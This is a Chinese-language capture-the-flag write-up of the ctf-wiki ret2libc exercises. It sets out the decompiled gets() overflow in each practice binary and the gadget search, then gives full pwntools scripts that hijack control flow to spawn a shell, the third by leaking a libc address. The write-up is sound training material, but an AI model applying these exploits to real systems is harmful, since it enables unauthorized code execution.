ctfwiki-pwn-ret2libc

2023-12-10 15:06:39

ret2libc

原理：ret2libc即控制函数执行libc中的函数，通常返回至某个函数的plt处或者函数的具体位置（即函数对应的got表项的内容）。一般情况下，我们会选择执行system("/bin/sh"),故而此时我们需要知道system函数的地址。

ret2libc1

[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

查看程序源代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("RET2LIBC >_<");
  gets(&s);
  return 0;
}

使用ROPgadget工具查找'/bin/sh'

root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc1 --string '/bin/sh'
Strings information
============================================================
0x08048720 : /bin/sh

在查找sys函数，看是否存在

.plt:08048460 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS CTRL-NUMPAD+ TO EXPAND]

exp

from pwn import *
#by diaolan
io=process("./ret2libc1")
binsh_addr = 0x08048720
plt_sys_addr = 0x08048460
pd = flat(['a'*112,plt_sys_addr,'b'*4,binsh_addr])
io.sendline(pd)
io.interactive()

ret2libc2

[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("Something surprise here, but I don't think it will work.");
  printf("What do you think ?");
  gets(&s);
  return 0;
}

pwndbg> cyclic -l caab
108

.plt:08048490 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS CTRL-NUMPAD+ TO EXPAND]

root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc2 --string '/bin/sh'
Strings information
============================================================

找不到/bin/sh

root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc2 --only 'pop|ret'
Gadgets information
============================================================
0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1

exp如下

from pwn import *
#by diaolan
sh=process("./ret2libc2")
gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
pd = flat(['a'*112,gets_plt,pop_ebx,buf2,system_plt,'b'*4,buf2])
sh.sendline(pd)
sh.sendline('/bin/sh')
sh.interactive()

ret2libc3

root@moli-virtual-machine:~/文档/ret2libc# checksec ret2libc3
[*] '/root/\xe6\x96\x87\xe6\xa1\xa3/ret2libc/ret2libc3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+1Ch] [ebp-64h]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("No surprise anymore, system disappeard QQ.");
  printf("Can you find it !?");
  gets(&s);
  return 0;
}

pwndbg> cyclic -l caab
108

root@moli-virtual-machine:~/文档/ret2libc# ROPgadget --binary ret2libc3 --string '/bin/sh'
Strings information
============================================================

既没有/bin/sh，也没有sys

知识点

sys函数属于libc，而libc.so动态链接库中的函数之间的相对偏移是固定的
即使程序开启了ASLR保护，也只是针对地址中间位进行随机，最低的12位不会发生变化
如果我们知道libc某个函数的地址，那么我们就可以确定该程序利用的libc，进而我们就可以知道sys函数的地址
由于got表的延迟绑定机制，我们需要泄露已经执行过的函数的地址
在得到libc后，libc中也有binsh，我们可以直接得到binsh的地址

操作步骤

泄露_libc_start_main地址
获取libc版本
获取sys地址与/bin/sh地址
再次执行源程序
触发system('/bin/sh')

exp如下

from pwn import *
from LibcSearcher import *
#by diaolan
sh = process('./ret2libc3')
ret2libc3 = ELF('./ret2libc3')

puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']

payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])

sh.sendlineafter('Can you find it !?', payload)
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])

sh.sendline(payload)

sh.interactive()

码农公寓

ret2libc

ret2libc1

ret2libc2

ret2libc3

知识点

相关文章